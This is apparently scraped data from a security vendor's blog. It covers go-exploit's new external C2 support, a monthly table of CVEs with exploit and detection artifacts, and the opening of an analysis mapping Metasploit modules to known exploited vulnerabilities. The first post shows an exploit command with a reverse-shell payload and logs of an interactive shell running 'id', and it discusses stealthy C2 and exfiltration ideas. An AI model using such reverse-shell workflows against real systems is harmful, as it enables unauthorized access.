interactive shell. (default true)\n-SSHShellServer.server-messages\n Print server messages to the client\n",[886,67018,67019,67027,67049,67054,67073,67078,67105,67110],{"__ignoreMap":219},[1373,67020,67021,67024],{"class":1375,"line":1376},[1373,67022,67023],{"class":2206},"-SSHShellServer.command",[1373,67025,67026],{"class":1391}," string\n",[1373,67028,67029,67032,67034,67037,67039,67042,67044,67046],{"class":1375,"line":220},[1373,67030,67031],{"class":2206}," Run",[1373,67033,52105],{"class":1391},[1373,67035,67036],{"class":1391}," single",[1373,67038,16726],{"class":1391},[1373,67040,67041],{"class":1391}," and",[1373,67043,57418],{"class":1391},[1373,67045,57354],{"class":1391},[1373,67047,67048],{"class":1391}," payload.\n",[1373,67050,67051],{"class":1375,"line":1266},[1373,67052,67053],{"class":2206},"-SSHShellServer.heartbeat\n",[1373,67055,67056,67059,67062,67065,67068,67070],{"class":1375,"line":1852},[1373,67057,67058],{"class":2206}," Print",[1373,67060,67061],{"class":1391}," heartbeat",[1373,67063,67064],{"class":1391}," checkins",[1373,67066,67067],{"class":1391}," from",[1373,67069,57354],{"class":1391},[1373,67071,67072],{"class":1391}," c2\n",[1373,67074,67075],{"class":1375,"line":4692},[1373,67076,67077],{"class":2206},"-SSHShellServer.interactive\n",[1373,67079,67080,67082,67084,67087,67089,67092,67095,67098,67101,67103],{"class":1375,"line":4724},[1373,67081,67031],{"class":2206},[1373,67083,57354],{"class":1391},[1373,67085,67086],{"class":1391}," commands",[1373,67088,57301],{"class":1391},[1373,67090,67091],{"class":1391}," an",[1373,67093,67094],{"class":1391}," interactive",[1373,67096,67097],{"class":1391}," shell.",[1373,67099,67100],{"class":4640}," (default ",[1373,67102,10874],{"class":7054},[1373,67104,11875],{"class":4640},[1373,67106,67107],{"class":1375,"line":4756},[1373,67108,67109],{"class":2206},"-SSHShellServer.server-messages\n",[1373,67111,67112,67114,67117,67120,67122,67124],{"class":1375,"line":4768},[1373,67113,67058],{"class":2206},[1373,67115,67116],{"class":1391}," server",[1373,67118,67119],{"class":1391}," messages",[1373,67121,55503],{"class":1391},[1373,67123,57354],{"class":1391},[1373,67125,67126],{"class":1391}," client\n",[18,67128,67129],{},"Of course, everyone likes shells, so here's what it looks like in real exploit usage of the reverse SSH shell server external module:",[1354,67131,67133],{"className":31740,"code":67132,"language":2186,"meta":219,"style":219},"poptart@grimm $ go run exploit.go -lhost 127.0.0.1 -lport 2222 -rhost 127.0.0.1 -rport 1337 -e -fll DEBUG -ell DEBUG -payload ..\u002Fpayload\u002Freverse_shell\u002Freverse_shell\ntime=2024-09-04T12:36:35.970-06:00 level=DEBUG msg=\"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 Safari\u002F537.36\"\ntime=2024-09-04T12:36:35.971-06:00 level=STATUS msg=\"Starting target\" index=0 host=127.0.0.1 port=1337 ssl=false \"ssl auto\"=false\ntime=2024-09-04T12:36:35.971-06:00 level=DEBUG msg=\"External SSH Listener starting: 127.0.0.1:2222\"\ntime=2024-09-04T12:36:35.974-06:00 level=DEBUG msg=\"SSH: Handshaking for 127.0.0.1:35222\"\ntime=2024-09-04T12:36:35.977-06:00 level=SUCCESS msg=\"Active shell SSH: Connection accepted from poptart@127.0.0.1:35222 session: 100f32d6dbee3f705dfc41dc3527b5f7b9b3eef845f3ab9e1da1bacd36c41901 (SSH-2.0-OpenSSH_9.7)\"\ntime=2024-09-04T12:36:35.977-06:00 level=STATUS msg=\"Interactive session started\"\nid\ntime=2024-09-04T12:36:41.930-06:00 level=STATUS msg=\"Running command on SSH client: 'id'\"\ntime=2024-09-04T12:36:42.082-06:00 level=SUCCESS msg=\"uid=1000(poptart) gid=100(users) groups=100(users),67(libvirtd)\\n\"\n",[886,67134,67135,67186,67213,67271,67296,67322,67348,67373,67377,67403],{"__ignoreMap":219},[1373,67136,67137,67139,67141,67143,67146,67149,67151,67154,67156,67159,67161,67163,67165,67167,67169,67172,67175,67178,67180,67183],{"class":1375,"line":1376},[1373,67138,9373],{"class":2206},[1373,67140,45557],{"class":4640},[1373,67142,19024],{"class":1391},[1373,67144,67145],{"class":1391}," run",[1373,67147,67148],{"class":1391}," exploit.go",[1373,67150,38916],{"class":2209},[1373,67152,67153],{"class":5467}," 127.0.0.1",[1373,67155,38922],{"class":2209},[1373,67157,67158],{"class":5467}," 2222",[1373,67160,38910],{"class":2209},[1373,67162,67153],{"class":5467},[1373,67164,45568],{"class":2209},[1373,67166,45581],{"class":5467},[1373,67168,38907],{"class":2209},[1373,67170,67171],{"class":2209}," -fll",[1373,67173,67174],{"class":1391}," DEBUG",[1373,67176,67177],{"class":2209}," -ell",[1373,67179,67174],{"class":1391},[1373,67181,67182],{"class":2209}," -payload",[1373,67184,67185],{"class":1391}," ..\u002Fpayload\u002Freverse_shell\u002Freverse_shell\n",[1373,67187,67188,67190,67192,67195,67197,67199,67202,67204,67206,67208,67211],{"class":1375,"line":220},[1373,67189,38930],{"class":4640},[1373,67191,5417],{"class":1397},[1373,67193,67194],{"class":1391},"2024-09-04T12:36:35.970-06:00",[1373,67196,38938],{"class":4640},[1373,67198,5417],{"class":1397},[1373,67200,67201],{"class":1391},"DEBUG",[1373,67203,38946],{"class":4640},[1373,67205,5417],{"class":1397},[1373,67207,183],{"class":1387},[1373,67209,67210],{"class":1391},"Using the HTTP User-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F125.0.0.0 Safari\u002F537.36",[1373,67212,19057],{"class":1387},[1373,67214,67215,67217,67219,67222,67224,67226,67228,67230,67232,67234,67236,67238,67240,67242,67244,67246,67248,67250,67252,67254,67257,67259,67261,67263,67265,67267,67269],{"class":1375,"line":1266},[1373,67216,38930],{"class":4640},[1373,67218,5417],{"class":1397},[1373,67220,67221],{"class":1391},"2024-09-04T12:36:35.971-06:00",[1373,67223,38938],{"class":4640},[1373,67225,5417],{"class":1397},[1373,67227,38943],{"class":1391},[1373,67229,38946],{"class":4640},[1373,67231,5417],{"class":1397},[1373,67233,183],{"class":1387},[1373,67235,38979],{"class":1391},[1373,67237,183],{"class":1387},[1373,67239,38984],{"class":4640},[1373,67241,5417],{"class":1397},[1373,67243,445],{"class":1391},[1373,67245,38991],{"class":4640},[1373,67247,5417],{"class":1397},[1373,67249,48753],{"class":1391},[1373,67251,38999],{"class":4640},[1373,67253,5417],{"class":1397},[1373,67255,67256],{"class":1391},"1337",[1373,67258,39007],{"class":4640},[1373,67260,5417],{"class":1397},[1373,67262,5971],{"class":1391},[1373,67264,4883],{"class":1387},[1373,67266,39016],{"class":1391},[1373,67268,183],{"class":1387},[1373,67270,39021],{"class":1391},[1373,67272,67273,67275,67277,67279,67281,67283,67285,67287,67289,67291,67294],{"class":1375,"line":1852},[1373,67274,38930],{"class":4640},[1373,67276,5417],{"class":1397},[1373,67278,67221],{"class":1391},[1373,67280,38938],{"class":4640},[1373,67282,5417],{"class":1397},[1373,67284,67201],{"class":1391},[1373,67286,38946],{"class":4640},[1373,67288,5417],{"class":1397},[1373,67290,183],{"class":1387},[1373,67292,67293],{"class":1391},"External SSH Listener starting: 127.0.0.1:2222",[1373,67295,19057],{"class":1387},[1373,67297,67298,67300,67302,67305,67307,67309,67311,67313,67315,67317,67320],{"class":1375,"line":4692},[1373,67299,38930],{"class":4640},[1373,67301,5417],{"class":1397},[1373,67303,67304],{"class":1391},"2024-09-04T12:36:35.974-06:00",[1373,67306,38938],{"class":4640},[1373,67308,5417],{"class":1397},[1373,67310,67201],{"class":1391},[1373,67312,38946],{"class":4640},[1373,67314,5417],{"class":1397},[1373,67316,183],{"class":1387},[1373,67318,67319],{"class":1391},"SSH: Handshaking for 127.0.0.1:35222",[1373,67321,19057],{"class":1387},[1373,67323,67324,67326,67328,67331,67333,67335,67337,67339,67341,67343,67346],{"class":1375,"line":4724},[1373,67325,38930],{"class":4640},[1373,67327,5417],{"class":1397},[1373,67329,67330],{"class":1391},"2024-09-04T12:36:35.977-06:00",[1373,67332,38938],{"class":4640},[1373,67334,5417],{"class":1397},[1373,67336,39062],{"class":1391},[1373,67338,38946],{"class":4640},[1373,67340,5417],{"class":1397},[1373,67342,183],{"class":1387},[1373,67344,67345],{"class":1391},"Active shell SSH: Connection accepted from poptart@127.0.0.1:35222 session: 100f32d6dbee3f705dfc41dc3527b5f7b9b3eef845f3ab9e1da1bacd36c41901 (SSH-2.0-OpenSSH_9.7)",[1373,67347,19057],{"class":1387},[1373,67349,67350,67352,67354,67356,67358,67360,67362,67364,67366,67368,67371],{"class":1375,"line":4756},[1373,67351,38930],{"class":4640},[1373,67353,5417],{"class":1397},[1373,67355,67330],{"class":1391},[1373,67357,38938],{"class":4640},[1373,67359,5417],{"class":1397},[1373,67361,38943],{"class":1391},[1373,67363,38946],{"class":4640},[1373,67365,5417],{"class":1397},[1373,67367,183],{"class":1387},[1373,67369,67370],{"class":1391},"Interactive session started",[1373,67372,19057],{"class":1387},[1373,67374,67375],{"class":1375,"line":4768},[1373,67376,9460],{"class":2206},[1373,67378,67379,67381,67383,67386,67388,67390,67392,67394,67396,67398,67401],{"class":1375,"line":4792},[1373,67380,38930],{"class":4640},[1373,67382,5417],{"class":1397},[1373,67384,67385],{"class":1391},"2024-09-04T12:36:41.930-06:00",[1373,67387,38938],{"class":4640},[1373,67389,5417],{"class":1397},[1373,67391,38943],{"class":1391},[1373,67393,38946],{"class":4640},[1373,67395,5417],{"class":1397},[1373,67397,183],{"class":1387},[1373,67399,67400],{"class":1391},"Running command on SSH client: 'id'",[1373,67402,19057],{"class":1387},[1373,67404,67405,67407,67409,67412,67414,67416,67418,67420,67422,67424,67427],{"class":1375,"line":4798},[1373,67406,38930],{"class":4640},[1373,67408,5417],{"class":1397},[1373,67410,67411],{"class":1391},"2024-09-04T12:36:42.082-06:00",[1373,67413,38938],{"class":4640},[1373,67415,5417],{"class":1397},[1373,67417,39062],{"class":1391},[1373,67419,38946],{"class":4640},[1373,67421,5417],{"class":1397},[1373,67423,183],{"class":1387},[1373,67425,67426],{"class":1391},"uid=1000(poptart) gid=100(users) groups=100(users),67(libvirtd)\\n",[1373,67428,19057],{"class":1387},[18,67430,67431],{},"Historically, many of these components interact with some sort of console or a framework for catching and managing caught callbacks. One thing this decoupling allows for is exploits written in go-exploit to move to more of an API-driven management, which lets the framework move beyond catching simple TCP or TLS shells and interacts with those frameworks directly. This is further helped by the fact that go-exploit is designed to output in JSON or structured formats. The server-to-client or client-to-server distinction quickly becomes an abstracted component and lets go-exploit integrate with anyone who can write that external C2 module for your favorite tooling.",[61,67433,67435],{"id":67434},"support-experimentation","Support experimentation",[18,67437,67438],{},"VulnCheck believes that there are lots of lesser-known or less battle-tested techniques for C2 communications that are just sitting on the table for attackers. Over the years, I've Discussed how routing protocols have the potential to be used for exfiltration due to firewall rules being more permissive about allowing for routing. I’ve also highlighted how statically interacting with web applications for using Slack\u002FTeams\u002FDropbox\u002Fetc was error-prone and how having a C2 channel that could use dynamically evaluated interactions could increase stability and stealth or how many shared object reflections that have long been popular with real-world malware never trickled into the mainstream OSS security tooling. All of these have been little experiments I've messed with but have been difficult to directly plug and play into real-world exploits… until now.",[18,67440,67441],{},"Experimentation should be easy and having a framework that allows for easy and agnostic interaction allows for more \"cool weirdness\" to propagate. Ideally, this creates an environment where both attackers and defenders can focus on fundamentals.",[61,67443,67445],{"id":67444},"the-future-integrating-c2s","The future & integrating C2s",[18,67447,67448],{},"Of course, this isn't the end. There are some sharp edges around ensuring that binary payload delivery is more supported in the framework; more examples, programmatic exploit input, and examples of supporting C2 frameworks are all in the works. The team also has more work to do to support external frameworks by allowing the external C2 channels to declare what types of payloads they support to exploit the payload to C2 channels and explicitly declare dependencies.",[18,67450,67451],{},"The team also believes that the C2 integration allows for some of the most powerful interactions with targets via go-exploit. We look forward to establishing a community for those who want to interact with go-exploit.",[18,67453,67454,67455,67460],{},"The world in which you can plug Go exploit into your favorite platform isn’t far away. This wil enable your next Red Team with all of the excellent exploits written in go-exploit and the ",[47,67456,67459],{"href":67457,"rel":67458},"https:\u002F\u002Fdocs.vulncheck.com\u002Fproducts\u002Finitial-access-intelligence\u002Ffetch-artifacts",[51],"large collection of VulnCheck Initial Access Intelligence exploits"," that we provide to customers.",[2901,67462,67463],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .s8HiA, html code.shiki .s8HiA{--shiki-light:#FF5370;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":67465},[67466,67467,67468],{"id":66678,"depth":220,"text":66679},{"id":67434,"depth":220,"text":67435},{"id":67444,"depth":220,"text":67445},"Adding support for external C2 channels and payloads in the go-exploit framework to enable flexible exploitation interaction and platform integration.",{"slug":67471},"go-exploit-external-c2s","\u002Fblog\u002Fgo-exploit-external-c2s",{"title":66602,"description":67469},"blog\u002Fgo-exploit-external-c2s","uvhDhwV3xF3nhQjTiBTJZikxF0A2tcbBV0N_qxNDdAw",{"id":67477,"title":67478,"articles":7,"authors":67479,"body":67481,"date":68005,"description":68006,"extension":234,"image":7,"link":7,"meta":68007,"navigation":237,"path":68008,"seo":68009,"series":7,"stem":68010,"subtype":7,"tags":68011,"__hash__":68012},"blog\u002Fblog\u002Finitial-access-intelligence-august-2024.md","VulnCheck Initial Access Intelligence Update - August 2024",[67480],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":67482,"toc":68000},[67483,67485,67488,67491,67497,67500,67516,67520,67986,67988,67993,67995],[18,67484,59412],{},[18,67486,67487],{},"In August 2024, VulnCheck crossed 270+ Initial Access Intelligence (IAI) artifacts, developing artifacts for 20 CVEs, covering 17 different vendors and products.",[18,67489,67490],{},"It's worth mentioning that CVE-2024-38856, affecting Apache OFBiz, had detection artifacts published by VulnCheck on August 5, 2024. The vulnerability was later confirmed as exploited in the wild by Fortinet on August 19, 2024, and CISA on August 27, 2024.",[18,67492,67493],{},[68,67494],{":width":10862,"alt":67495,"src":67496},"Initial Access Intelligence - July 2024","\u002Fblog\u002Finitial-access-intelligence-august-2024\u002Finitial-access-august-2024.png",[18,67498,67499],{},"To provide better visibility into these updates, we've broken down August's Initial Access Intelligence Artifacts by CVE. For each CVE, we provide a range of detection tools including:",[22,67501,67502,67504,67506,67508,67510,67512,67514],{},[25,67503,325],{},[25,67505,59440],{},[25,67507,59443],{},[25,67509,59446],{},[25,67511,59449],{},[25,67513,59452],{},[25,67515,64745],{},[61,67517,67519],{"id":67518},"august-2024-initial-access-artifacts","August 2024 Initial Access Artifacts",[307,67521,67522,67544],{},[310,67523,67524],{},[313,67525,67526,67528,67530,67532,67534,67536,67538,67540,67542],{},[316,67527,59471],{},[316,67529,59474],{},[316,67531,319],{},[316,67533,59479],{},[316,67535,59482],{},[316,67537,59485],{},[316,67539,59488],{},[316,67541,61654],{},[316,67543,61657],{},[336,67545,67546,67569,67591,67613,67635,67657,67679,67701,67723,67745,67767,67789,67810,67832,67854,67876,67898,67920,67942,67964],{},[313,67547,67548,67551,67554,67557,67559,67561,67563,67565,67567],{},[341,67549,67550],{},"Exim SPA Auth Bypass",[341,67552,67553],{},"2024-08",[341,67555,67556],{},"CVE-2020-12783",[341,67558,59510],{},[341,67560,59510],{},[341,67562,59510],{},[341,67564,59510],{},[341,67566],{},[341,67568],{},[313,67570,67571,67574,67576,67579,67581,67583,67585,67587,67589],{},[341,67572,67573],{},"GNU GLIBC \"Looney Tunables\" Local Privilege Escalation",[341,67575,67553],{},[341,67577,67578],{},"CVE-2023-4911",[341,67580,59510],{},[341,67582,59510],{},[341,67584],{},[341,67586],{},[341,67588],{},[341,67590,59510],{},[313,67592,67593,67596,67598,67601,67603,67605,67607,67609,67611],{},[341,67594,67595],{},"Anyscale Ray CPU Profile Command Injection",[341,67597,67553],{},[341,67599,67600],{},"CVE-2023-6019",[341,67602,59510],{},[341,67604,59510],{},[341,67606,59510],{},[341,67608,59510],{},[341,67610,59510],{},[341,67612],{},[313,67614,67615,67618,67620,67623,67625,67627,67629,67631,67633],{},[341,67616,67617],{},"WooCommerce Payments Authentication Bypass",[341,67619,67553],{},[341,67621,67622],{},"CVE-2023-28121",[341,67624,59510],{},[341,67626,59510],{},[341,67628,59510],{},[341,67630,59510],{},[341,67632,59510],{},[341,67634],{},[313,67636,67637,67640,67642,67645,67647,67649,67651,67653,67655],{},[341,67638,67639],{},"Anyscale Ray Job Execution (Unpatched)",[341,67641,67553],{},[341,67643,67644],{},"CVE-2023-48022",[341,67646,59510],{},[341,67648,59510],{},[341,67650,59510],{},[341,67652,59510],{},[341,67654,59510],{},[341,67656],{},[313,67658,67659,67662,67664,67667,67669,67671,67673,67675,67677],{},[341,67660,67661],{},"Delta Electronics DIAEnergie RecalculateScript Script Injection",[341,67663,67553],{},[341,67665,67666],{},"CVE-2024-4547",[341,67668,59510],{},[341,67670,59510],{},[341,67672,59510],{},[341,67674,59510],{},[341,67676,59510],{},[341,67678],{},[313,67680,67681,67684,67686,67689,67691,67693,67695,67697,67699],{},[341,67682,67683],{},"Delta Electronics DIAEnergie RecalculateHDMWYC Script Injection",[341,67685,67553],{},[341,67687,67688],{},"CVE-2024-4548",[341,67690,59510],{},[341,67692,59510],{},[341,67694,59510],{},[341,67696,59510],{},[341,67698,59510],{},[341,67700],{},[313,67702,67703,67706,67708,67711,67713,67715,67717,67719,67721],{},[341,67704,67705],{},"Fortra FileCatalyst Workflow SQL Injection",[341,67707,67553],{},[341,67709,67710],{},"CVE-2024-5276",[341,67712,59510],{},[341,67714],{},[341,67716,59510],{},[341,67718,59510],{},[341,67720,59510],{},[341,67722],{},[313,67724,67725,67728,67730,67733,67735,67737,67739,67741,67743],{},[341,67726,67727],{},"Calibre Content Server RCE",[341,67729,67553],{},[341,67731,67732],{},"CVE-2024-6782",[341,67734,59510],{},[341,67736,59510],{},[341,67738,59510],{},[341,67740,59510],{},[341,67742,59510],{},[341,67744],{},[313,67746,67747,67750,67752,67755,67757,67759,67761,67763,67765],{},[341,67748,67749],{},"Ivanti vTM Authentication Bypass",[341,67751,67553],{},[341,67753,67754],{},"CVE-2024-7593",[341,67756,59510],{},[341,67758,59510],{},[341,67760,59510],{},[341,67762,59510],{},[341,67764,59510],{},[341,67766,59510],{},[313,67768,67769,67772,67774,67777,67779,67781,67783,67785,67787],{},[341,67770,67771],{},"SPIP porte_plume plugin unauthenticated RCE",[341,67773,67553],{},[341,67775,67776],{},"CVE-2024-7954",[341,67778,59510],{},[341,67780,59510],{},[341,67782,59510],{},[341,67784,59510],{},[341,67786,59510],{},[341,67788],{},[313,67790,67791,67794,67796,67798,67800,67802,67804,67806,67808],{},[341,67792,67793],{},"Cisco Smart Software Manager On-Prem Password Reset",[341,67795,67553],{},[341,67797,31448],{},[341,67799,59510],{},[341,67801],{},[341,67803,59510],{},[341,67805,59510],{},[341,67807,59510],{},[341,67809],{},[313,67811,67812,67815,67817,67820,67822,67824,67826,67828,67830],{},[341,67813,67814],{},"Spring Cloud Dataflow Arbitrary File Write",[341,67816,67553],{},[341,67818,67819],{},"CVE-2024-22263",[341,67821],{},[341,67823],{},[341,67825,59510],{},[341,67827,59510],{},[341,67829,59510],{},[341,67831],{},[313,67833,67834,67837,67839,67842,67844,67846,67848,67850,67852],{},[341,67835,67836],{},"Authentication bypass allows for administrative access to upload ASP documents, leading to remote code execution.",[341,67838,67553],{},[341,67840,67841],{},"CVE-2024-26331",[341,67843,59510],{},[341,67845,59510],{},[341,67847,59510],{},[341,67849,59510],{},[341,67851,59510],{},[341,67853],{},[313,67855,67856,67859,67861,67864,67866,67868,67870,67872,67874],{},[341,67857,67858],{},"SolarWinds Web Help Desk Hard-coded Credentials",[341,67860,67553],{},[341,67862,67863],{},"CVE-2024-28987",[341,67865],{},[341,67867],{},[341,67869],{},[341,67871,59510],{},[341,67873,59510],{},[341,67875],{},[313,67877,67878,67881,67883,67886,67888,67890,67892,67894,67896],{},[341,67879,67880],{},"IPv6 Network Stack Overflow DoS",[341,67882,67553],{},[341,67884,67885],{},"CVE-2024-38063",[341,67887,59510],{},[341,67889],{},[341,67891,59510],{},[341,67893],{},[341,67895],{},[341,67897],{},[313,67899,67900,67903,67905,67908,67910,67912,67914,67916,67918],{},[341,67901,67902],{},"Windows Server MadLicense Unauth RCE",[341,67904,67553],{},[341,67906,67907],{},"CVE-2024-38077",[341,67909],{},[341,67911],{},[341,67913,59510],{},[341,67915,59510],{},[341,67917,59510],{},[341,67919],{},[313,67921,67922,67925,67927,67930,67932,67934,67936,67938,67940],{},[341,67923,67924],{},"Apache OFBiz improper authorization checks allow for RCE",[341,67926,67553],{},[341,67928,67929],{},"CVE-2024-38856",[341,67931,59510],{},[341,67933,59510],{},[341,67935,59510],{},[341,67937,59510],{},[341,67939,59510],{},[341,67941,59510],{},[313,67943,67944,67947,67949,67952,67954,67956,67958,67960,67962],{},[341,67945,67946],{},"Bazarr Path Traversal",[341,67948,67553],{},[341,67950,67951],{},"CVE-2024-40348",[341,67953,59510],{},[341,67955,59510],{},[341,67957,59510],{},[341,67959,59510],{},[341,67961,59510],{},[341,67963],{},[313,67965,67966,67969,67971,67974,67976,67978,67980,67982,67984],{},[341,67967,67968],{},"Fonoster VoiceServer VoiceApp Path Traversal Info Leak",[341,67970,67553],{},[341,67972,67973],{},"CVE-2024-43035",[341,67975],{},[341,67977],{},[341,67979,59510],{},[341,67981,59510],{},[341,67983,59510],{},[341,67985],{},[61,67987,59830],{"id":59829},[18,67989,65143,67990,59],{},[47,67991,20558],{"href":14297,"rel":67992},[51],[61,67994,59851],{"id":59850},[18,67996,59854,67997],{},[47,67998,59857],{"href":59857,"rel":67999},[51],{"title":219,"searchDepth":220,"depth":220,"links":68001},[68002,68003,68004],{"id":67518,"depth":220,"text":67519},{"id":59829,"depth":220,"text":59830},{"id":59850,"depth":220,"text":59851},"2024-09-04","In August 2024, we developed new Initial Access Intelligence (IAI) artifacts for 20 CVEs, covering 17 different vendors and products.",{},"\u002Fblog\u002Finitial-access-intelligence-august-2024",{"title":67478,"description":68006},"blog\u002Finitial-access-intelligence-august-2024",[1281],"HALcTIP3gnAMXBmvPAGxlzfwQyqa3bdOKuDOgRr0GqI",{"id":68014,"title":68015,"articles":68016,"authors":68025,"body":68027,"date":68130,"description":68131,"extension":234,"image":7,"link":7,"meta":68132,"navigation":237,"path":68134,"seo":68135,"series":7,"stem":68136,"subtype":7,"tags":68137,"__hash__":68138},"blog\u002Fblog\u002Fmetasploit-kev.md","Weaponized Vulnerabilities Deserve a Seat at The Prioritization Table",[68017,68022],{"title":68018,"source":68019,"link":68020,"date":68021},"CramHacks Chronicles #51: Weekly Cybersecurity Newsletter!","CramHacks","https:\u002F\u002Fwww.cramhacks.com\u002Fp\u002Fcramhacks-51?_bhlid=bd3a8eb9d66eba5a9e4cb752dc97a6d76db047cb&utm_campaign=cramhacks-chronicles-51-weekly-cybersecurity-newsletter&utm_medium=newsletter&utm_source=www.cramhacks.com","2024-08-28",{"title":68023,"source":61436,"link":68024,"date":68021},"Risky Biz News: Volt Typhoon returns with a new zero-day","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-volt-typhoon-returns-with-a-new-zero-day\u002F",[68026],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":68028,"toc":68124},[68029,68035,68038,68041,68045,68052,68056,68060,68066,68069,68073,68078,68081,68085,68091,68094,68098,68104,68107,68113,68115,68117,68119],[18,68030,68031],{},[68,68032],{":width":10862,"alt":68033,"src":68034},"Metasploit Mapped to KEV by Year","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev-year.png",[18,68036,68037],{},"On the weekends, I often dive into vulnerability data, searching for new sources of known exploitation. This process frequently leads to uncovering evidence of vulnerabilities being exploited in the wild that haven't been documented before. As I comb through older security advisories, blogs, and forums, I often encounter familiar mentions of HD Moore and the Metasploit project.",[18,68039,68040],{},"Given this, I set out to highlight in this research the importance of prioritizing and remediating weaponized vulnerabilities by mapping Metasploit modules with Known Exploited Vulnerabilities to provide deeper insight.",[1920,68042,68044],{"id":68043},"what-is-a-weaponized-vulnerability","What is a Weaponized Vulnerability?",[18,68046,68047,68048,68051],{},"Weaponized vulnerabilities are those with explicit malicious intent, historic malware usage, prior reports of exploitation, or inclusion in point-and-click exploitation frameworks or kits. Projects facilitating point-and-click exploitation could include malicious exploit kits, such as those previously tracked by Contagio, or open source or commercial offerings like Metasploit, VulnCheck Initial Access Intelligence, CANVAS, or Core Impact. Additionally, weaponized exploits often have secondary payloads, droppers, or implants. In our ",[47,68049,57777],{"href":44893,"rel":68050},[51],"published in May, we observed 2% of vulnerabilities over the past decade that have been weaponized.",[1920,68053,68055],{"id":68054},"observations-from-mapping-known-exploitation-to-the-metasploit-project","Observations from Mapping Known Exploitation to the Metasploit Project",[61,68057,68059],{"id":68058},"a-first-look-at-metasploit-modules-mapped-to-known-exploited-vulnerabilities","A First Look at Metasploit Modules Mapped to Known Exploited Vulnerabilities",[18,68061,68062],{},[68,68063],{":width":10862,"alt":68064,"src":68065},"Metasploit Mapped to KEV","\u002Fblog\u002Fmetasploit-kev\u002Fmetasploit-kev.png",[18,68067,68068],{},"Initially, I explored existing vulnerabilities with a Metasploit module that mapped to a Known Exploited Vulnerability (KEV) in VulnCheck KEV. I also considered breaking out CISA KEV, which is included in VulnCheck KEV, for this analysis. The data revealed that 26% of Metasploit modules are associated with a Known 